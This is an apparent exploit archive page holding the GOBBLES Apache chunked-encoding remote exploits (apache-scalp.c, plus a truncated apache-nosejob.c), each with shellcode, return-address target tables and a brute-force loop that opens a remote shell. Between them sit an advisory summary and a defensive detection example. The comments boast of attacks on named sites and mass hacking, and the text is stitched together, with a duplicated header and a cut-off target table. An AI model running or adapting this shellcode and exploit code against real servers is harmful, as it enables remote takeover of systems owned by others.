 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great. 
 *
 * [#!GOBBLES QUOTES]
 * 
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?       
 * --- I hope Theo doesn't kill himself                        
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>                           
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>


#define EXPLOIT_TIMEOUT		5	/* num seconds to wait before assuming it failed */
#define RET_ADDR_INC		512


#define MEMCPY_s1_OWADDR_DELTA	-146
#define PADSIZE_1		4
#define PADSIZE_2 		5
#define PADSIZE_3		7


#define REP_POPULATOR		24
#define REP_RET_ADDR		6
#define REP_ZERO		36
#define REP_SHELLCODE		24
#define NOPCOUNT		1024

#define NOP			0x41
#define PADDING_1		'A'
#define PADDING_2		'B'
#define PADDING_3		'C'

#define PUT_STRING(s)		memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)		memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =
  "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
  "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
  "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
  "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
  "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
  "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
  "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
  "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
  "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";


struct {
	char *type;
	u_long retaddr;
} targets[] = {	// hehe, yes theo, that say OpenBSD here!
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",	0xcf92f },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",	0x8f0aa },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",	0x8f2a6 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",	0x9011a },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",	0x932ae },
};


int main(int argc, char *argv[]) {

	char           *hostp, *portp;
	unsigned char   buf[512], *expbuf, *p;
	int             i, j, lport;
	int             sock;
	int             bruteforce, owned, progress;
	u_long          retaddr;
	struct sockaddr_in sin, from;


	if(argc != 3) {
		printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
		printf("  Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
		printf("  Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
		printf("\n--- --- - Potential targets list - --- ----\n");
		printf("Target ID / Target specification\n");
		for(i = 0; i < sizeof(targets)/sizeof(targets[0]); i++)
			printf("\t%d / %s\n", i, targets[i].type);

		return -1;
	}


	hostp = strtok(argv[2], ":");
	if((portp = strtok(NULL, ":")) == NULL)
		portp = "80";

	retaddr = strtoul(argv[1], NULL, 16);
	if(retaddr < sizeof(targets)/sizeof(targets[0])) {	/* same ABI-independent count as in usage */
		retaddr = targets[retaddr].retaddr;
		bruteforce = 0;
	}
	else
		bruteforce = 1;
		

	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

		/* skip return addresses containing CR or LF, which would terminate the header line */
		i = retaddr & 0xff;
		if(i == 0x0a || i == 0x0d)
			retaddr++;
		else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
			continue;


		sock = socket(AF_INET, SOCK_STREAM, 0);
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = inet_addr(hostp);
		sin.sin_port = htons(atoi(portp));
		if(!progress)
			printf("\n[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		/* Setup the local port in our shellcode */
		i = sizeof(from);
		if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
			perror("getsockname()");
			exit(1);
		}

		lport = ntohs(from.sin_port);
		shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
		shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;


		p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
				    + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");

		for (i = 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p += sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i = 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j = 0; j < REP_RET_ADDR; j++) {
				*p++ = retaddr & 0xff;
				*p++ = (retaddr >> 8) & 0xff;
				*p++ = (retaddr >> 16) & 0xff;
				*p++ = (retaddr >> 24) & 0xff;
			}

			PUT_BYTES(REP_ZERO, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
		PUT_STRING(buf);

		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) == 0)
			progress = 1;

		if(progress == 1) {
			memset(buf, 0, sizeof(buf));
			sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
				retaddr, (unsigned int)(p - expbuf), lport);
			memset(buf + strlen(buf), ' ', 74 - strlen(buf));
			puts(buf);
			if(bruteforce)
				putchar(';');
		}
		else
			putchar((rand()%2)? 'P': 'p');


		fflush(stdout);
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec = EXPLOIT_TIMEOUT;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);

			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
						break;

					if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
						printf("\nGOBBLE GOBBLE!@#%%)*#\n");
						printf("retaddr 0x%lx did the trick!\n", retaddr);
						sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
						write(sock, expbuf, strlen(expbuf));
						owned++;
					}

					write(1, buf, n);
				}

				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);

					write(sock, buf, n);
				}
			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}
		

- Vulnerability Information (21560)

Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2) (EDBID:21560)
multiple remote
2002-06-17 Verified
0 Gobbles Security
N/A
source: http://www.securityfocus.com/bid/5033/info
 
When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.
 
**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.
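The mechanics behind that one-line description, as an added example that is not part of the advisory, of the GOBBLES exploits or of Apache's source: a 32-bit parser for the chunk-size line, a model of the flawed signed clamp beside an unsigned one, and a walker that flags a chunked body carrying a sign-bit chunk size, run over a tail constructed to match what apache-nosejob sends (PADSIZE_2 = 5 bytes of 'B', then a size field printed with %x from delta -146). The 8192-byte buffer size and all function names are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse the hex size field of a chunk-size line as a 32-bit value, the
 * width of the length variable in a 32-bit build. Returns the value
 * (0..0xffffffff) or -1 if there are no hex digits or the value needs more
 * than 32 bits. Parsing stops at ';' (chunk extensions), CR, or any other
 * non-hex byte, as HTTP/1.1 allows. */
static int64_t parse_chunk_size(const char *line)
{
    uint32_t v = 0;
    int ndigits = 0;
    for (; *line != '\0'; line++, ndigits++) {
        int c = (unsigned char)*line, d;
        if (c >= '0' && c <= '9')      d = c - '0';
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else break;
        if (v > 0x0fffffffu)            /* a ninth significant digit would wrap */
            return -1;
        v = (v << 4) | (uint32_t)d;
    }
    return ndigits == 0 ? -1 : (int64_t)v;
}

/* Model of the flawed clamp (assumed for illustration, not Apache's code):
 * the chunk length lives in a signed variable and is compared signed with
 * the buffer size, then handed to the copy routine, which takes it as an
 * unsigned size. 0xffffff6e is -146 as int32, so it passes the test and the
 * copy is asked for roughly 4 GB. */
static uint32_t vulnerable_len_to_read(uint32_t chunk_len, int32_t bufsiz)
{
    int32_t remaining = (int32_t)chunk_len;
    int32_t len_to_read = (remaining > bufsiz) ? bufsiz : remaining;
    return (uint32_t)len_to_read;               /* what memcpy() receives */
}

/* Hardened clamp: keep the length unsigned throughout, so a set sign bit
 * only makes the chunk "too big", which the clamp handles. Rejecting such
 * a request outright is the stricter option. */
static uint32_t safe_len_to_read(uint32_t chunk_len, uint32_t bufsiz)
{
    return chunk_len > bufsiz ? bufsiz : chunk_len;
}

/* Walk a chunked body (the bytes after the blank line that ends the
 * headers). Returns 1 if any chunk-size field has its sign bit set when
 * read as a 32-bit integer, 0 if the body is well formed through the
 * last-chunk, -1 if it is malformed or truncated. */
static int body_has_negative_chunk(const char *body, size_t len)
{
    size_t pos = 0;
    while (pos < len) {
        const char *eol = memchr(body + pos, '\n', len - pos);
        char line[40];
        size_t linelen;
        int64_t sz;
        if (eol == NULL)
            return -1;
        linelen = (size_t)(eol - (body + pos));
        if (linelen >= sizeof line)
            return -1;                          /* absurdly long size field */
        memcpy(line, body + pos, linelen);
        line[linelen] = '\0';
        if ((sz = parse_chunk_size(line)) < 0)
            return -1;
        if (sz & 0x80000000)
            return 1;                           /* negative as int32 */
        if (sz == 0)
            return 0;                           /* last-chunk */
        pos = (size_t)(eol - body) + 1 + (size_t)sz + 2;   /* data + CRLF */
    }
    return -1;                                  /* no last-chunk seen */
}

/* The chunked tail apache-nosejob emits, constructed here from its
 * constants: a 5-byte chunk of 'B' followed by a size field printed with
 * %x from delta -146. */
static const char *constructed_exploit_tail(void)
{
    static char tail[64];
    snprintf(tail, sizeof tail, "%x\r\n%s\r\n%x\r\n", 5u, "BBBBB", (unsigned int)-146);
    return tail;
}

int main(void)
{
    const char *tail = constructed_exploit_tail();
    int64_t sz = parse_chunk_size("ffffff6e");
    printf("size field ffffff6e -> %u, as int32 %d\n", (unsigned)sz, (int32_t)(uint32_t)sz);
    printf("flawed clamp passes %u bytes to the copy; fixed clamp passes %u\n",
           vulnerable_len_to_read((uint32_t)sz, 8192), safe_len_to_read((uint32_t)sz, 8192));
    printf("exploit tail flagged: %d\n", body_has_negative_chunk(tail, strlen(tail)));
    return 0;
}
```

The flawed clamp returns the chunk length untouched because -146 compares less than 8192 as a signed value; the copy routine then sees 0xffffff6e. A proxy or IDS that walks the chunked body can apply the same test as body_has_negative_chunk(); a rule that inspects only the request headers sees nothing unusual, since the malicious value sits in the body after a perfectly ordinary first chunk.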

/*
 * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
 *
 * !! THIS EXPLOIT IS NOW PRIVATE ON BUGTRAQ !!
 *
 * USE BRUTE FORCE ! "AUTOMATED SCRIPT KIDDY" ! USE BRUTE FORCE !
 *
 * YEZ!$#@ YOU CAN EVEN DEFACE BUGTRAQ.ORG! 
 *
 * Your high priced security consultant's plane ticket: $1500
 * Your high priced security consultant's time: $200/hour
 * RealSecure nodes all over your company: $200,000
 * Getting owned by 0day: Priceless
 *  
 * * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR *
 * If somebody could do us a big favor and contact Jennifer Garner and ask
 * her to make a journey to Vegas this summer for Defcon, to hang out with
 * the members of GOBBLES Security who are all huge fans of hers, we would
 * be eternally grateful.  We are 100% serious about this.  We would love 
 * to have a chance to sit down and have a nice conversation with her during
 * the conference -- something little to make our lives feel more complete.
 *
 * Just show her this picture, and she'll understand that we're not some
 * crazy obsessive fanatical lunatics that she would want to avoid. ;-)
 * 		http://phrack.org/summercon2002/GOBBLES_show.jpg
 * We even promise to keep our clothes on!
 *
 * Thx to all those GOBBLES antagonizers. Your insults fuel our desire to
 * work harder to gain more fame.
 *
 * This exploit brought to you by a tagteam effort between GOBBLES Security
 * and ISS X-Forces.  ISS supplied the silly mathematical computations and
 * other abstract figures declaring the exploitation of this bug to be 
 * impossible, without factoring in the chance that there might be other
 * conditions present that would allow exploitation.  After the failure of
 * ISS' Santa Claus, GOBBLES Security didn't want to disappoint the kids and
 * the security consultants and have brought forth a brand new shiny toy for
 * all to marvel at.
 *
 * GOBBLES Security Sex Force:  A lot of companies like to let you know
 * their employees have the biggest dicks.  We're firm believers in the 
 * idea that it's not the size of the wave, but rather the motion of the
 * ocean -- we have no choice anyway.
 * 
 * 3APAPAPA said this can't be done on FreeBSD. He probably also thinks
 * qmail can't be exploited remotely. Buzzz! There we go speaking through
 * our asses again.  Anyways we're looking forward to his arguments on why
 * this isn't exploitable on Linux and Solaris.  Lead, follow, or get the 
 * fuck out of the way.
 *
 * Weigh the chances of us lying about the Linux version. Hmm, well so far
 * we've used a "same shit, different smell" approach on *BSD, so you could
 * be forgiven for thinking we have no Linux version. Then bring in the
 * reverse psychology factor of this paragraph that also says we don't have
 * one. But we'd say all of the above to make you believe us. This starts to
 * get really complicated.
 *
 * --- 
 * God knows I'm helpless to speak
 * On my own behalf
 * God is as helpless as me
 * Caught in the negatives
 * We all just do as we please
 * False transmissions
 * I hope God forgives me
 * For my transgressions
 *
 * It's what you want
 * To know no consequences
 * It's what you need
 * To fucking bleed
 * It's all too much
 * ---
 * 
 * Changes:
 * + can do hostname resolution
 * + uses getopt() 
 * + works against freebsd and netbsd now
 * + ability to execute custom commands when shellcode replies -- great for
 *   mass hacking
 * + rand() value bitshifted for more randomness in our progress bar tongues
 * + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!!
 * + [RaFa] complained that the first version didn't let him hack through
 *   proxies.  New shellcode has been added for additional fun.  It's real
 *   funky, monkey, do you trust?  Didn't think so.
 *
 * Fun to know:
 * + Most apache installations don't even log the attack
 * + GOBBLES Security is not playing games anymore.
 * + GOBBLES Security has more active members than w00w00.
 * + w00w00.org is still vulnerable to this exploit.
 * + w00w00 might release another AIM advisory soon about how evil the
 *   whole DMCA thing is.  *yawn*
 * 
 * Fun to do:
 * + Spot the #openbsd operator who can figure out how to use this!
 * + Join #snort and laugh at their inadequacies
 * + Question the effectiveness of Project Honeynet, when they have yet
 *   to discover the exploitation of a single "0day" vulnerability in the
 *   wild.  HURRY UP B0YZ 4ND H4CK Y0UR 0WN H0N3YP0TZ N0W W1TH 4LL Y0UR
 *   0DAY T0 PR0V3 US WR0NG!!@#  Dumb twats.
 *
 * 80% of #openbsd won't be patching Apache because:
 * + "It's not in the default install"
 * + "It's only uid nobody. So what?"
 * + "Our memcpy() implementation is not buggy"
 * + "I couldn't get the exploit to work, so it must not actually be
 *    exploitable.  Stupid GOBBLES wasting my time with nonsense"
 * + jnathan's expert advice to his peers is that "this is not much of
 *   a security issue" -- @stake + w00w00 + snort brain power in action!
 *
 * Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com,
 *	     yahoo.com, project.honeynet.org, pub.seastrom.com
 *
 * !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! NOTICE TO CRITICS !!
 * 
 * If you're using this exploit against a vulnerable machine (that the
 * exploit is supposed to work on, quit mailing us asking why apache-scalp
 * doesn't work against Linux -- dumbasses) and it does not succeed, you
 * will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE * 
 * * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE *
 * 
 * We wrote this for ethical purposes only.  There is such a thing as an
 * "ethical hacker" right?
 *
 * This should make penetration testing _very_ easy.  Go out and make some
 * money off this, by exploiting the ignorance of some yahoo who will be
 * easily ./impressed with your ability to use gcc.  No, we won't provide
 * you with precompiled binaries.  Well, at least for *nix. ;-) 
 *
 * * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUNCEMENT *
 * --- GOBBLES Security is no longer accepting new members.  We're now a 
 *     closed group.  Of course, we'll still share our warez with the 
 *     community at large, but for the time we have enough members.  
 *
 *     Greets to our two newest members:
 *	-[RaFa], Ambassador to the Underworld
 *	-pr0ix, Director of Slander and Misinformation
 *
 * [#!GOBBLES@SECRET_SERVER QUOTES]
 *
 * --- i wont be surprised that when I return tomorrow morning the
 *     internet will have come to a grinding halt with people crying for
 *     medics
 * --- the internet will be over in a couple of months 
 * --- nobody in #openbsd can get it to work... #netbsd people seem to be
 *     managing fine...  
 * --- they dont grasp the concept of the base address... i seriously
 *     thought this was the most kiddie friendly exploit ever released
 * --- even bb could get it working. look at vuln-dev
 * --- we have to try to bump that threatcon up a notch
 * --- what the alldas url now? how many defacements appeared yet?
 * --- we should do a poem entitled "default openbsd" and mention how
 *     it just sits there... inanimate... soon theo will be stripping the
 *     network code so not even gobkltz.c works... as theo's paranoia
 *     increases and he becomes out of sync with the real world, strange
 *     things start to happen with openbsd...  CHANGELOG: "now also safe
 *     from the voices. 6 years without the screaming in the default
 *     install"
 * --- i can port it to windows.. i can make a gui using mfc.. with
 *     a picture of the skull & crossbones 
 * --- Has anyone ever been caught by an IDS? I certainly never have.
 *     This one runs on many machines. It ports to HP-UX.
 * --- strange how mr spitzner didn't know honeynet.org was owned
 * --- an official openbsd mirror is still vulnerable?  dear god they're
 *     out of it!
 * --- I think we're finally famous.
 * --- we're on the front page of securityfocus, and we didn't even have 
 *     to deface them!  too bad the article wasn't titled, "Hi BlueBoar!"
 * --- we need GOBBLES group photos at defcon holding up signs that say
 *     "The Blue Boar Must Die"
 * --- project.honeynet.org is _still_ vulnerable a day after the exploit
 *     was made public?  hahaha!
 * --- exploit scanner?  www.google.com -- search for poweredby.gif + your
 *     *bsd of choice!
 * --- i stopped taking my antipsychotics last night.  say no 2 drugz!
 * --- <GOBBLES> antiNSA -- HACKING IS NOT FOR YOU!!!!!!
 * --- we wonder how much they'll like GeneralCuster.exe 
 * --- wonder if ISS will use our code in their "security assessment" 
 *     audits, or if they'll figure out how to exploit this independently.
 *     either way they're bound to make a lot of money off us, bastards.
 * --- forget w00giving, this year itz thanksgiving.
 * --- the traffic to netcraft.com/whats will be through the roof for the
 *     next few months!
 * --- every company with a hub has been sold multiple realsensor units
 * --- full disclosure is a necessary evil, so quit your goddamned whining.
 * --- people just assume they know what we mean by "testbed"
 * --- i can't believe that people still disbelieve in the existence of 
 *     hackers... i mean, what is all this bullshit about people being 
 *     shocked that hackers write programs to break into systems so that
 *     they can use those programs to break into systems?  are their minds
 *     that small?
 * --- we're far from done. . .
 *
 */

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
 * 
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 * 
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great. 
 *
 * [#!GOBBLES QUOTES]
 * 
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?       
 * --- I hope Theo doesn't kill himself                        
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>                           
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif


#define HOST_PARAM	"apache-nosejob.c"		/* The Host: field */
#define DEFAULT_CMDZ	"uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC	512


#define PADSIZE_1	4
#define PADSIZE_2 	5
#define PADSIZE_3	7


#define REP_POPULATOR	24
#define REP_SHELLCODE	24
#define NOPCOUNT	1024

#define NOP		0x41
#define PADDING_1	'A'
#define PADDING_2	'B'
#define PADDING_3	'C'

#define PUT_STRING(s)	memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)	memset(p, b, n); p += n;

char shellcode[] =
  "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";

struct {
	char *type;		/* description for newbie penetrator */
	int delta;		/* delta thingie! */
	u_long retaddr;		/* return address */
	int repretaddr;		/* we repeat retaddr thiz many times in the buffer */
	int repzero;		/* and \0'z this many times */
} targets[] = {	// hehe, yes theo, that say OpenBSD here!
	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80f3a00, 6, 36 },
	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80a7975, 6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",		 -146,	0xcfa00,   6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",		 -146,	0x8f0aa,   6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",		 -146,	0x90600,   6, 36 },
